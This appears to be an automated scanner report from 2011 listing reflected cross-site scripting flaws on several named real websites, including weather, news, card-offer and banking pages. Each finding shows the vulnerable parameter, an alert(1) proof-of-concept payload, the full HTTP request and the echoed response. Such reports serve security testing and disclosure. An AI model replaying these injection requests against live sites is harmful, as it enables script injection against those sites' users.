Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:17:56 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n32), ms jfk-agg-n32 ( origin>CONN)
Cache-Control: max-age=3360
Expires: Thu, 03 Feb 2011 17:13:56 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913
//v1.0
function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... Type; return ret; }
The value of the logo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32db1"%3balert(1)//42b70526543 was submitted in the logo parameter. This input was echoed as 32db1";alert(1)//42b70526543 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=132db1"%3balert(1)//42b70526543&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:57 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n38), ms jfk-agg-n38 ( origin>CONN)
Cache-Control: max-age=3420
Expires: Thu, 03 Feb 2011 17:13:57 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913
//v1.0
function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=132db1";alert(1)//42b70526543&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=132db1";ale ...[SNIP]...
The value of the metric request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2096f"%3balert(1)//1ba13126b12 was submitted in the metric parameter. This input was echoed as 2096f";alert(1)//1ba13126b12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=02096f"%3balert(1)//1ba13126b12&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:19:10 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n26), ms jfk-agg-n26 ( origin>CONN) Cache-Control: max-age=3300 Expires: Thu, 03 Feb 2011 17:14:10 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... edAttrs["type"] = mimeType; return ret; }
The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37e8c"%3balert(1)//8d39e9c745 was submitted in the partner parameter. This input was echoed as 37e8c";alert(1)//8d39e9c745 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather37e8c"%3balert(1)//8d39e9c745&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:16:21 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n26), ms jfk-agg-n26 ( origin>CONN) Cache-Control: max-age=3060 Expires: Thu, 03 Feb 2011 17:07:21 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3911
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... nversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather37e8c";alert(1)//8d39e9c745&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather37e8c";ale ...[SNIP]...
The value of the tStyle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2cc6"%3balert(1)//085e153a142 was submitted in the tStyle parameter. This input was echoed as c2cc6";alert(1)//085e153a142 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normalc2cc6"%3balert(1)//085e153a142&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:16:38 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n28), ms jfk-agg-n28 ( origin>CONN) Cache-Control: max-age=3180 Expires: Thu, 03 Feb 2011 17:09:38 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normalc2cc6";alert(1)//085e153a142&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normalc2cc6";ale ...[SNIP]...
The value of the target request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4df0b"%3balert(1)//aada13118d6 was submitted in the target parameter. This input was echoed as 4df0b";alert(1)//aada13118d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self4df0b"%3balert(1)//aada13118d6 HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:19:31 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n8), ms jfk-agg-n8 ( origin>CONN) Cache-Control: max-age=2760 Expires: Thu, 03 Feb 2011 17:05:31 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... "] = mimeType; return ret; }
The value of the theme request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e337d"%3balert(1)//a1ece0aaeff was submitted in the theme parameter. This input was echoed as e337d";alert(1)//a1ece0aaeff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=cloudse337d"%3balert(1)//a1ece0aaeff&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:18:53 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n4), ms jfk-agg-n4 ( origin>CONN) Cache-Control: max-age=3180 Expires: Thu, 03 Feb 2011 17:11:53 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... ) ret.embedAttrs["type"] = mimeType; return ret; }
The value of the zipcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8162"%3balert(1)//ba94b6bb5ca was submitted in the zipcode parameter. This input was echoed as c8162";alert(1)//ba94b6bb5ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025c8162"%3balert(1)//ba94b6bb5ca&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:17:32 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n11 ( jfk-agg-n34), ms jfk-agg-n34 ( origin>CONN) Cache-Control: max-age=2820 Expires: Thu, 03 Feb 2011 17:04:32 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... uginsPage; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; }
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5ef3"><script>alert(1)</script>3b1abce3997 was submitted in the REST URL parameter 5. This input was echoed as b5ef3\"><script>alert(1)</script>3b1abce3997 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810b5ef3"><script>alert(1)</script>3b1abce3997/ HTTP/1.1 Host: ocresort.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:15:25 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://ocresort.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:15:25 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 56355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... alternate" type="application/rss+xml" title=" Page not found - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810b5ef3\"><script>alert(1)</script>3b1abce3997/feed/" /> ...[SNIP]...
4.413. http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f4a3"><script>alert(1)</script>ebc82fd6548 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f4a3\"><script>alert(1)</script>ebc82fd6548 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?8f4a3"><script>alert(1)</script>ebc82fd6548=1 HTTP/1.1 Host: ocresort.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:15:05 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://ocresort.ocregister.com/xmlrpc.php Link: <http://ocresort.ocregister.com/?p=68810>; rel=shortlink Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 78618
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... " title=" Disney parks renovate 9 attractions, other areas - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?8f4a3\"><script>alert(1)</script>ebc82fd6548=1feed/" /> ...[SNIP]...
4.414. http://offers.amexnetwork.com/portalext/inline/back_support_mock_ie.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://offers.amexnetwork.com
Path: /portalext/inline/back_support_mock_ie.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 457ed'-alert(1)-'43bbf2ba26d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /portalext/inline/back_support_mock_ie.jsp?457ed'-alert(1)-'43bbf2ba26d=1 HTTP/1.1 Host: offers.amexnetwork.com Proxy-Connection: keep-alive Referer: http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shoppinga21a4%22%3E%3Cscript%3Ealert(1)%3C/script%3E9146dd0abe&issuerName=us_prop&inav=menu_rewards_shopping Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Surrogate-Control: no-store Content-Type: text/html;charset=UTF-8 Content-Language: en-US Vary: Accept-Encoding Cache-Control: no-cache Expires: Thu, 03 Feb 2011 15:39:08 GMT Date: Thu, 03 Feb 2011 15:39:08 GMT Connection: close Content-Length: 125
<script> function getLocation() { return '457ed'-alert(1)-'43bbf2ba26d=1'; }
The value of the categoryPath request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a21a4"><script>alert(1)</script>9146dd0abe was submitted in the categoryPath parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /selects/us/grid?categoryPath=/amexnetwork/category/Shoppinga21a4"><script>alert(1)</script>9146dd0abe&issuerName=us_prop&inav=menu_rewards_shopping HTTP/1.1 Host: offers.amexnetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Content-Type: text/html; charset=UTF-8 Content-Language: en-US Cache-Control: no-cache Expires: Thu, 03 Feb 2011 14:22:55 GMT Date: Thu, 03 Feb 2011 14:22:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 215250
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the issuerName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13a13"><script>alert(1)</script>8d46a60ecb1 was submitted in the issuerName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop13a13"><script>alert(1)</script>8d46a60ecb1&inav=menu_rewards_shopping HTTP/1.1 Host: offers.amexnetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Content-Type: text/html; charset=UTF-8 Content-Language: en-US Cache-Control: no-cache Expires: Thu, 03 Feb 2011 14:27:34 GMT Date: Thu, 03 Feb 2011 14:27:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 291329
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the issuerName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82cc0"%3balert(1)//5ac35aa2ed1 was submitted in the issuerName parameter. This input was echoed as 82cc0";alert(1)//5ac35aa2ed1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop82cc0"%3balert(1)//5ac35aa2ed1&inav=menu_rewards_shopping HTTP/1.1 Host: offers.amexnetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Content-Type: text/html; charset=UTF-8 Content-Language: en-US Cache-Control: no-cache Expires: Thu, 03 Feb 2011 14:28:36 GMT Date: Thu, 03 Feb 2011 14:28:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 287293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the issuerName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bae6e'%3balert(1)//ad3a1fe5923 was submitted in the issuerName parameter. This input was echoed as bae6e';alert(1)//ad3a1fe5923 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_propbae6e'%3balert(1)//ad3a1fe5923&inav=menu_rewards_shopping HTTP/1.1 Host: offers.amexnetwork.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Content-Type: text/html; charset=UTF-8 Content-Language: en-US Cache-Control: no-cache Expires: Thu, 03 Feb 2011 14:29:41 GMT Date: Thu, 03 Feb 2011 14:29:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 287293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]... .do?localLocale=en-us&categoryPath=/amexnetwork/category/Shopping&localCountryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&pocsort=2&countryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&issuerName=us_propbae6e';alert(1)//ad3a1fe5923', { method:'GET', onComplete:parseXml }); } function parseXml(response) { var responseXml = response.responseXML; //alert(responseXml); var m ...[SNIP]...
The value of the adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4a7"><script>alert(1)</script>c726bd08fb8 was submitted in the adid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?keyword=online%20banking&adid=3b4a7"><script>alert(1)</script>c726bd08fb8 HTTP/1.1 Host: onlinecheckingsbanking.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8916"><script>alert(1)</script>2d8d0fb1f0b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?keyword=b8916"><script>alert(1)</script>2d8d0fb1f0b&adid=289819058 HTTP/1.1 Host: onlinecheckingsbanking.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
4.421. http://onlinecheckingsbanking.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://onlinecheckingsbanking.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b820e"><script>alert(1)</script>6f57152ba82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?keyword=online%20banking&adid=289819058&b820e"><script>alert(1)</script>6f57152ba82=1 HTTP/1.1 Host: onlinecheckingsbanking.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the term request parameter is copied into the HTML document as plain text between tags. The payload 9183b<script>alert(1)</script>6fd4fa2c65b was submitted in the term parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.php?d=peoplesbank.com&cachekey=1296747318&rc=true&term=Internet+banking9183b<script>alert(1)</script>6fd4fa2c65b&append= HTTP/1.1 Host: peoplesbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=n94u5lhrbr0a5c7as50gdp2tc0;
Response
HTTP/1.1 200 OK X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache P3P: CP="NOI COR NID ADMa DEVa PSAa PSDa STP NAV DEM STA PRE" Cache-Control: no-cache Content-type: text/html Connection: close Date: Thu, 03 Feb 2011 15:41:42 GMT Server: lighttpd Content-Length: 18861
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="au ...[SNIP]... <span class="searchedfor">INTERNET BANKING9183B<SCRIPT>ALERT(1)</SCRIPT>6FD4FA2C65B</span> ...[SNIP]...
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 346ad'%3balert(1)//f0a82ea655a was submitted in the admeld_callback parameter. This input was echoed as 346ad';alert(1)//f0a82ea655a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.0 200 OK Server: IM BidManager Date: Thu, 03 Feb 2011 19:02:42 GMT P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Expires: Thu, 03-Feb-2011 19:02:22 GMT Content-Type: text/javascript Pragma: no-cache Cache-Control: no-cache Content-Length: 368
The value of the jpcb request parameter is copied into the HTML document as plain text between tags. The payload d5e7e<script>alert(1)</script>1fda4ce402e was submitted in the jpcb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the jpctx request parameter is copied into the HTML document as plain text between tags. The payload fa896<script>alert(1)</script>11222906e44 was submitted in the jpctx parameter. This input was echoed unmodified in the application's response.
